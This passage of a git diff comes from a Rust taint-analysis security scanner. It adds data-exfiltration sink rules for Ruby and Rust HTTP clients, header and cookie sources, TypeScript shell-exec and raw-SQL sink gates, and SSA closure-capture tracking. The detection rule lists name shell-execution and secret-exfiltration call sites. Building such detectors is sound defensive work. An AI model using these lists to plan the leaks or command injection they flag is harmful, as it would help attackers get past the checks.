`Net::HTTP.post(uri, data, headers)` — stdlib + // * `Net::HTTP::Post.new(path)` body= setter — emitted as + // `Net::HTTP::Post.body=` after Ruby setter normalisation; flat rule + // ensures any tainted assignment to `.body` smears into the request + // * `RestClient.post(url, payload, headers)` — rest-client gem + // * `Faraday.post(url, body, headers)` — faraday + // * `HTTParty.post(url, body: ..., headers: ...)` — already a Sink(SSRF) + // above, DATA_EXFIL adds independently + // * `Typhoeus.post(url, body: ...)` — typhoeus + LabelRule { + matchers: &[ + "Net::HTTP.post", + "RestClient.post", + "RestClient.put", + "RestClient.patch", + "Faraday.post", + "Faraday.put", + "Faraday.patch", + "HTTParty.post", + "HTTParty.put", + "HTTParty.patch", + "Typhoeus.post", + "Typhoeus.put", + "Typhoeus.patch", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, + // Generic outbound-method suffix matchers for chained / typed receivers + // (e.g. `client.post(payload)` where `client` is a configured Faraday or + // RestClient instance). Suffix-match keeps the rule compact; source + // sensitivity gates noise from plain user input. + LabelRule { + matchers: &["HttpClient.post", "HttpClient.put", "HttpClient.patch"], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, LabelRule { matchers: &["Marshal.load", "Marshal.restore", "YAML.load"], label: DataLabel::Sink(Cap::DESERIALIZE), diff --git a/src/labels/rust.rs b/src/labels/rust.rs index 68826c11..da6255d7 100644 --- a/src/labels/rust.rs +++ b/src/labels/rust.rs @@ -19,6 +19,34 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Inbound HTTP request metadata: headers, cookies, query strings, + // and body extractors. These only carry caller-supplied bytes when + // the framework binds them (the framework-conditional rules attach + // the same labels for axum / actix / rocket extractors). Including + // the bare suffix matchers here means a `req.headers().get("h")` + // chain in non-framework code (e.g. internal helpers that take an + // `&HeaderMap`) still surfaces as a Source. `infer_source_kind` + // routes these to `Header` / `Cookie` (Sensitive), enabling + // DATA_EXFIL gating downstream. + LabelRule { + matchers: &[ + // Type-qualified (receiver typed as HttpRequest, HeaderMap, ...) + "HttpRequest.headers", + "HttpRequest.cookie", + "HttpRequest.cookies", + "Request.headers", + "Request.cookies", + "Request.uri", + // Bare HeaderMap / cookie-jar accessors. + "headers.get", + "headers.get_all", + "CookieJar.get", + "CookieJar.get_private", + "CookieJar.get_signed", + ], + label: DataLabel::Source(Cap::all()), + case_sensitive: false, + }, // ───────── Sanitizers ────────── LabelRule { matchers: &["html_escape::encode_safe", "sanitize_", "sanitize_html"], @@ -75,6 +103,34 @@ pub static RULES: &[LabelRule] = &[ "reqwest::Client.head", "reqwest::Client.patch", "reqwest::Client.request", + // Chained constructor + verb form: `reqwest::Client::new() + // .post(url)` reduces (via root-receiver collapse) to chain + // text `Client::new.post`, so existing `Client.post` matchers + // miss it. Cover the chained shape directly. + "Client::new.get", + "Client::new.post", + "Client::new.put", + "Client::new.delete", + "Client::new.head", + "Client::new.patch", + "Client::new.request", + // surf free verbs are themselves SSRF gates , the URL is + // their first positional argument. + "surf::get", + "surf::post", + "surf::put", + "surf::delete", + "surf::head", + "surf::patch", + "surf::connect", + "surf::trace", + // ureq free verbs are HTTP request initiators. + "ureq::get", + "ureq::post", + "ureq::put", + "ureq::delete", + "ureq::patch", + "ureq::head", // Type-qualified (receiver typed as HttpClient) "HttpClient.get", "HttpClient.post", @@ -89,6 +145,68 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // Cross-boundary data exfiltration sinks. Outbound HTTP egress where + // a Sensitive source (env, header, cookie, file, db) reaching the + // request body / payload is a leak distinct from SSRF. Plain user + // input is silenced by the source-sensitivity gate, so these only + // fire when the source carries operator-bound state. + // + // Body-binding methods on the request builder: `body`, `json`, `form`, + // `multipart` (reqwest); `body_string`, `body_json`, `body_bytes` + // (surf); `send_string`, `send_json`, `send_form` (ureq, which + // combines body-bind and dispatch). Plus `.send()` on an HttpClient + // / RequestBuilder, where the chain receiver is typed. Chain text + // matchers like `body.send` cover the all-in-one form + // `Client::post(url).body(payload).send()`. + LabelRule { + matchers: &[ + // Type-qualified terminal verbs (split form, typed receiver). + "HttpClient.send", + "HttpClient.execute", + "RequestBuilder.send", + // Type-qualified body-bind methods on a typed RequestBuilder. + "RequestBuilder.body", + "RequestBuilder.json", + "RequestBuilder.form", + "RequestBuilder.multipart", + "RequestBuilder.body_string", + "RequestBuilder.body_json", + "RequestBuilder.body_bytes", + "RequestBuilder.send_string", + "RequestBuilder.send_json", + "RequestBuilder.send_form", + // surf / ureq method names that are unambiguous in Rust , + // they only appear on HTTP request builders, so a bare-name + // suffix matcher is safe. + "body_string", + "body_json", + "body_bytes", + "send_string", + "send_json", + "send_form", + // Reqwest chain shapes. After paren-group strip the chain + // text becomes `Client::post.body.send`, so the body-bind + // verb sits before `.send` and a `body.send` suffix matcher + // pins exfil-only firing to chains that actually bind a body. + "body.send", + "json.send", + "form.send", + "multipart.send", + // hyper Request::builder().method(...).body(payload) , the + // body-bind step is the leak point. `.unwrap` is a common + // trailing identity method; we cover both shapes. + "Request::builder.body", + "Request::builder.method.body", + "Request::builder.method.body.unwrap", + "Request::builder.body.unwrap", + // Two-step reqwest where the user has a dedicated `Client` + // variable and uses `.execute(req)` on it. + "Client::new.send", + "Client::new.execute", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, LabelRule { matchers: &[ "rusqlite::Connection.execute", diff --git a/src/labels/typescript.rs b/src/labels/typescript.rs index fdc37e89..a5f5c413 100644 --- a/src/labels/typescript.rs +++ b/src/labels/typescript.rs @@ -92,6 +92,22 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sanitizer(Cap::HTML_ESCAPE), case_sensitive: false, }, + // Conventional forwarding wrappers, telemetry / analytics / metrics dispatch. + // See javascript.rs for rationale; mirrored here so TypeScript projects pick + // up the same convention. Override per-project via + // [analysis.languages.typescript] custom rules. + LabelRule { + matchers: &[ + "serializeForUpstream", + "forwardPayload", + "tracker.send", + "analytics.track", + "metrics.report", + "logEvent", + ], + label: DataLabel::Sanitizer(Cap::DATA_EXFIL), + case_sensitive: false, + }, // Conventional project-local HTML escapers. Suffix word-boundary match // fires on bare calls to locally defined helpers (`function escapeHtml(x)` // invoked as `escapeHtml(x)`) across codebases that follow the common @@ -113,18 +129,21 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::HTML_ESCAPE), case_sensitive: false, }, + // Shell-exec sinks. Qualified `child_process.*` and bare forms are both + // flat sinks; receiver-name collisions are handled via EXCLUDES; the + // `=*` gates in `GATED_SINKS` below restrict checked args to arg 0 + // (command string) so `execSync(cmd, { env: process.env })` no longer + // flags `process.env` flowing into the options object. See + // javascript.rs for full rationale. LabelRule { matchers: &[ "child_process.exec", "child_process.execSync", "child_process.spawn", "child_process.execFile", - // Bare forms from destructured imports: - // const { exec, execSync } = require('child_process') "exec", "execSync", "execFile", - // Common promisified wrappers around child_process.exec "execAsync", "execPromise", ], @@ -227,16 +246,12 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: false, }, - // ORM / query builder raw-SQL entry points + // ORM / query builder raw-SQL entry points. `$queryRawUnsafe` / + // `$executeRawUnsafe` are gated below — only arg 0 (the SQL template) is + // the injection vector; positional bind params are bound as `$1..$N`. + // See javascript.rs for the full rationale. LabelRule { - matchers: &[ - "sequelize.query", - "knex.raw", - "$queryRaw", - "$queryRawUnsafe", - "$executeRaw", - "$executeRawUnsafe", - ], + matchers: &["sequelize.query", "knex.raw", "$queryRaw", "$executeRaw"], label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: true, }, @@ -264,6 +279,9 @@ pub static EXCLUDES: &[&str] = &[ "req.app", "req.route", "req.next", + // Dockerode container API — see javascript.rs EXCLUDES for rationale. + "container.exec", + "exec.start", ]; pub static GATED_SINKS: &[SinkGate] = &[ @@ -478,6 +496,113 @@ pub static GATED_SINKS: &[SinkGate] = &[ object_destination_fields: &["body", "headers", "json"], }, }, + // ── Shell-exec sinks (SHELL_ESCAPE) ────────────────────────────────── + // See javascript.rs for the rationale. Only arg 0 (command string) + // carries the shell-injection payload; bare forms use `=` exact-only + // matching so they don't collide with any `.exec` method. + // Qualified `child_process.*` forms stay as flat sinks; gates only fire + // when no flat sink classifies the call, so the bare destructured-import + // forms below are the only place where shell-exec needs gating. + SinkGate { + callee_matcher: "=exec", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execSync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execFile", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execAsync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execPromise", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── Prisma raw-SQL with positional bind params (SQL_QUERY) ─────────── + // See javascript.rs for rationale. + SinkGate { + callee_matcher: "$queryRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "$executeRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, ]; pub static KINDS: Map<&'static str, Kind> = phf_map! { diff --git a/src/output.rs b/src/output.rs index 86e257c9..73b5d5d2 100644 --- a/src/output.rs +++ b/src/output.rs @@ -207,6 +207,18 @@ pub fn build_sarif(diags: &[Diag], scan_root: &Path) -> Value { props.insert("confidence".into(), json!(conf.to_string())); } + // `DATA_EXFIL` findings carry the destination object-literal + // field the leak reached (`body` / `headers` / `json`); surface + // it so SARIF consumers can pivot per-destination without + // reparsing the message. + if let Some(field) = d + .evidence + .as_ref() + .and_then(|ev| ev.data_exfil_field.as_deref()) + { + props.insert("data_exfil_field".into(), json!(field)); + } + // Alternative-path cross-references. When the dedup pass // at `taint::analyse_file` preserves both a validated and // an unvalidated flow for the same `(body, sink, source)`, diff --git a/src/pointer/analysis.rs b/src/pointer/analysis.rs index b7364441..c0a6a743 100644 --- a/src/pointer/analysis.rs +++ b/src/pointer/analysis.rs @@ -666,6 +666,8 @@ mod tests { exception_edges: vec![], field_interner: self.field_interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } } @@ -880,6 +882,8 @@ mod tests { exception_edges: vec![], field_interner: FieldInterner::new(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let facts = analyse_body(&body, body_id()); assert!(facts.is_trivial()); diff --git a/src/rank.rs b/src/rank.rs index 217d4fc4..d44fbac9 100644 --- a/src/rank.rs +++ b/src/rank.rs @@ -206,7 +206,16 @@ pub fn rank_diags(diags: &mut [Diag]) { /// Bonus based on analysis kind inferred from rule ID + evidence. fn analysis_kind_bonus(rule_id: &str, evidence: Option<&Evidence>) -> f64 { - if rule_id.starts_with("taint-") { + if rule_id.starts_with("taint-data-exfiltration") { + // DATA_EXFIL ranks below SSRF / SQLi / CMDi: the leak class is + // a softer signal than direct payload-driven exploitation, so + // the taint-class bonus is trimmed (-3) to seat data-exfil + // findings between general taint flows and AST/CFG patterns. + // The source-kind bonus (`evidence_strength`) already separates + // cookie / env / header from less attacker-relevant origins, + // so this bonus is the only ranking discount applied. + 7.0 + } else if rule_id.starts_with("taint-") { // Taint-confirmed flow is the strongest signal 10.0 } else if rule_id.starts_with("state-") { diff --git a/src/server/debug.rs b/src/server/debug.rs index 581264f6..46bf3ee0 100644 --- a/src/server/debug.rs +++ b/src/server/debug.rs @@ -1179,6 +1179,7 @@ fn type_kind_tag(k: &TypeKind) -> String { TypeKind::Url => "Url".into(), TypeKind::HttpClient => "HttpClient".into(), TypeKind::LocalCollection => "LocalCollection".into(), + TypeKind::RequestBuilder => "RequestBuilder".into(), TypeKind::Dto(_) => "Dto".into(), } } @@ -1872,6 +1873,7 @@ function consume() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2026,6 +2028,8 @@ async function recentAuditLogs() { exception_edges: vec![], field_interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let facts = analyse_body(&body, BodyId(0)); diff --git a/src/server/owasp.rs b/src/server/owasp.rs index 0ca9c16a..c4dafb0a 100644 --- a/src/server/owasp.rs +++ b/src/server/owasp.rs @@ -104,6 +104,14 @@ pub fn issue_categories( } fn issue_category_label(rule_id: &str) -> &'static str { + // `taint-data-exfiltration` and the legacy `taint-unsanitised-flow` + // share the `taint` family token, but the exfil class targets a + // different threat (sensitive data leaving the trust boundary, not + // attacker payload entering it). Surface it as its own bucket so the + // dashboard category badge matches the rule semantics. + if rule_id.starts_with("taint-data-exfiltration") { + return "Data Exfiltration"; + } match extract_family(rule_id) { "sqli" => "SQL Injection", "xss" => "Cross-Site Scripting", @@ -221,6 +229,26 @@ mod tests { assert_eq!(out[2].count, 2); } + #[test] + fn issue_category_label_routes_data_exfil_to_dedicated_bucket() { + // `taint-data-exfiltration` shares the `taint` family token with + // `taint-unsanitised-flow`, but exfil findings need their own + // dashboard badge so analysts can pivot on the leak class. + assert_eq!( + issue_category_label("taint-data-exfiltration"), + "Data Exfiltration" + ); + assert_eq!( + issue_category_label("taint-data-exfiltration (source 1:1)"), + "Data Exfiltration" + ); + // Generic taint findings stay in the broader bucket. + assert_eq!( + issue_category_label("taint-unsanitised-flow"), + "Tainted Flow" + ); + } + #[test] fn issue_category_label_recognises_simple_families() { assert_eq!( diff --git a/src/server/routes/debug.rs b/src/server/routes/debug.rs index 8df3de01..de913e90 100644 --- a/src/server/routes/debug.rs +++ b/src/server/routes/debug.rs @@ -445,6 +445,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )], ) @@ -516,6 +517,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, false, false, @@ -538,6 +541,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, true, true, @@ -560,6 +565,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, true, false, @@ -656,6 +663,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )], ) diff --git a/src/ssa/alias.rs b/src/ssa/alias.rs index a3c01371..ac7a6973 100644 --- a/src/ssa/alias.rs +++ b/src/ssa/alias.rs @@ -217,6 +217,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/ssa/const_prop.rs b/src/ssa/const_prop.rs index 9dfcc470..fb0c7e7d 100644 --- a/src/ssa/const_prop.rs +++ b/src/ssa/const_prop.rs @@ -638,6 +638,8 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/ssa/copy_prop.rs b/src/ssa/copy_prop.rs index fb18c2ec..5b4f355e 100644 --- a/src/ssa/copy_prop.rs +++ b/src/ssa/copy_prop.rs @@ -215,6 +215,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, copy_map) = copy_propagate(&mut body, &cfg); @@ -296,6 +298,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, copy_map) = copy_propagate(&mut body, &cfg); @@ -366,6 +370,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; (cfg, body) } @@ -488,6 +494,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, _map) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 0, "two-operand Assign is not a copy"); @@ -567,6 +575,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, _) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 1, "v1 should be eliminated"); @@ -664,6 +674,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, _map) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 1); @@ -712,6 +724,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, map) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 0); diff --git a/src/ssa/dce.rs b/src/ssa/dce.rs index 0ec7812e..1bbb328d 100644 --- a/src/ssa/dce.rs +++ b/src/ssa/dce.rs @@ -217,6 +217,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -265,6 +267,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -314,6 +318,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -359,6 +365,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -396,6 +404,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -460,6 +470,8 @@ mod tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -527,6 +539,8 @@ mod tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -587,6 +601,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -637,6 +653,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -724,6 +742,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -801,6 +821,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); diff --git a/src/ssa/invariants.rs b/src/ssa/invariants.rs index 5705aba8..774a9b14 100644 --- a/src/ssa/invariants.rs +++ b/src/ssa/invariants.rs @@ -788,6 +788,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( @@ -835,6 +837,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( @@ -885,6 +889,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( @@ -913,6 +919,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( diff --git a/src/ssa/ir.rs b/src/ssa/ir.rs index 94b9c882..112adae0 100644 --- a/src/ssa/ir.rs +++ b/src/ssa/ir.rs @@ -4,7 +4,7 @@ use crate::ssa::type_facts::TypeKind; use petgraph::graph::NodeIndex; use serde::{Deserialize, Serialize}; use smallvec::SmallVec; -use std::collections::HashMap; +use std::collections::{HashMap, HashSet}; /// Unique identifier for an SSA value (one per definition point). #[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize, Deserialize)] @@ -353,6 +353,26 @@ pub struct SsaBody { /// cleanly with an empty map (no migration needed). #[serde(default)] pub field_writes: HashMap, + /// SSA values that lowering injected for **free / closure-captured** + /// variables (variables referenced by the body but not declared as + /// formal parameters and not assigned within the body). + /// + /// Lowering models every external use as an [`SsaOp::Param`] in block + /// 0 so the rename pass can reference it. Real formal parameters and + /// closure captures end up using the same op variant; this side-table + /// distinguishes the two so downstream analyses (in particular the + /// JS/TS handler-name auto-seed in + /// [`crate::taint::ssa_transfer`]) can avoid treating closure + /// captures as if they were the function's own parameters. Without + /// this distinction, a lambda body that references an out-of-scope + /// `userId` / `cmd` / `payload` would have the synthetic Param + /// auto-seeded as `UserInput`, producing a phantom source on the + /// enclosing function's declaration line. + /// + /// `#[serde(default)]` for backward compatibility with summary blobs + /// produced before this field existed. + #[serde(default)] + pub synthetic_externals: HashSet, } impl SsaBody { @@ -560,6 +580,7 @@ mod tests { exception_edges: vec![], field_interner: FieldInterner::new(), field_writes: HashMap::new(), + synthetic_externals: HashSet::new(), }; let fid = body.intern_field("mu"); body.blocks[0].body.push(SsaInst { diff --git a/src/ssa/lower.rs b/src/ssa/lower.rs index 9ab2ca86..c8b3b12d 100644 --- a/src/ssa/lower.rs +++ b/src/ssa/lower.rs @@ -239,18 +239,25 @@ fn lower_to_ssa_inner( // 6. Rename variables (dominator tree preorder walk) let dom_tree_children = build_dom_tree_children(num_blocks, &doms, &block_graph); - let (mut ssa_blocks, mut value_defs, cfg_node_map, field_interner, field_writes) = - rename_variables( - cfg, - &blocks_nodes, - &block_succs, - &block_preds, - &phi_placements, - &dom_tree_children, - &filtered_edges, - &external_vars, - &nop_nodes, - ); + let ( + mut ssa_blocks, + mut value_defs, + cfg_node_map, + field_interner, + field_writes, + synthetic_externals, + ) = rename_variables( + cfg, + &blocks_nodes, + &block_succs, + &block_preds, + &phi_placements, + &dom_tree_children, + &filtered_edges, + &external_vars, + formal_params, + &nop_nodes, + ); // 6b. Fill any missing phi operands with a shared Undef sentinel so // every phi has exactly one operand per predecessor. See @@ -306,6 +313,7 @@ fn lower_to_ssa_inner( exception_edges, field_interner, field_writes, + synthetic_externals, }; // 9. Catch-block reachability invariant. @@ -927,6 +935,7 @@ fn rename_variables( dom_tree_children: &[Vec], filtered_edges: &[(NodeIndex, NodeIndex, EdgeKind)], external_vars: &[String], + formal_params: &[String], nop_nodes: &HashSet, ) -> ( Vec, @@ -934,6 +943,7 @@ fn rename_variables( HashMap, crate::ssa::ir::FieldInterner, HashMap, + HashSet, ) { let num_blocks = blocks_nodes.len(); let mut next_value: u32 = 0; @@ -1679,6 +1689,27 @@ fn rename_variables( // Inject synthetic Param instructions at START of block 0 for external variables. // These create SSA definitions so the rename pass can reference them. // Pre-seed var_stacks so process_block sees them. + // + // `external_vars` contains both real formal parameters and free / closure- + // captured variables (variables read by the body but not declared as a + // formal and not assigned anywhere). Both end up emitted as + // [`SsaOp::Param`] in block 0; we record the SSA values that correspond + // to free vars in `synthetic_externals` so downstream analyses (the JS/TS + // handler-name auto-seed in particular) can avoid treating closure + // captures as if they were parameters of the function under analysis. + // + // **Conservative behaviour when `formal_params` is empty.** Several + // call sites (`lower_to_ssa`, `lower_to_ssa_scoped_nop`) don't supply + // formal parameter names; in that case we cannot distinguish formals + // from free vars structurally, so we leave `synthetic_externals` empty + // and the auto-seed pass keeps its pre-fix behaviour of treating every + // `Param` op as a candidate. Only callers that pass a non-empty + // `formal_params` slice (`lower_to_ssa_with_params`, used by the + // findings pipeline's per-function lowering) opt into the + // closure-capture distinction. + let mut synthetic_externals: HashSet = HashSet::new(); + let formal_set: HashSet<&str> = formal_params.iter().map(|s| s.as_str()).collect(); + let track_synthetic = !formal_params.is_empty(); if !external_vars.is_empty() { let entry_cfg_node = blocks_nodes[0][0]; let mut synthetic_body = Vec::with_capacity(external_vars.len()); @@ -1691,7 +1722,8 @@ fn rename_variables( cfg_node: entry_cfg_node, block: BlockId(0), }); - let op = if is_receiver_name(var) { + let is_receiver = is_receiver_name(var); + let op = if is_receiver { SsaOp::SelfParam } else { let op = SsaOp::Param { @@ -1700,6 +1732,28 @@ fn rename_variables( positional_idx += 1; op }; + // A non-receiver var is "synthetic" (a free / closure capture) + // when it is *not* one of the function's declared formals AND + // not a dotted access on a formal (`input.cmd` where `input` is + // a formal — it represents a structural projection of the + // formal, not a free variable; the auto-seed should still treat + // it as part of the formal's own taint surface). Receivers are + // intentionally excluded: `this` / `self` represent the implicit + // receiver, which always belongs to the function. + // + // Only fire when the caller supplied formal-parameter names; see + // the `track_synthetic` rationale above. + let root_is_formal = var + .split_once('.') + .map(|(root, _)| formal_set.contains(root)) + .unwrap_or(false); + if track_synthetic + && !is_receiver + && !formal_set.contains(var.as_str()) + && !root_is_formal + { + synthetic_externals.insert(v); + } synthetic_body.push(SsaInst { value: v, op, @@ -1784,6 +1838,7 @@ fn rename_variables( cfg_node_map, field_interner, field_writes, + synthetic_externals, ) } diff --git a/src/ssa/param_points_to.rs b/src/ssa/param_points_to.rs index b20c18da..ecaeef0e 100644 --- a/src/ssa/param_points_to.rs +++ b/src/ssa/param_points_to.rs @@ -417,6 +417,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/ssa/static_map.rs b/src/ssa/static_map.rs index 6a558e9d..3f6351a2 100644 --- a/src/ssa/static_map.rs +++ b/src/ssa/static_map.rs @@ -440,6 +440,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg: Cfg = Graph::new(); let const_values = HashMap::new(); diff --git a/src/ssa/type_facts.rs b/src/ssa/type_facts.rs index a5f1aa90..16aa74fd 100644 --- a/src/ssa/type_facts.rs +++ b/src/ssa/type_facts.rs @@ -25,6 +25,15 @@ pub enum TypeKind { FileHandle, Url, HttpClient, + /// A pre-network HTTP request builder produced by `Client::post(url)`, + /// `surf::post(url)`, `Request::builder()`, `ureq::post(url)`, etc. + /// The body-bind methods (`body`, `json`, `form`, `multipart`, + /// `body_string`, `body_json`, 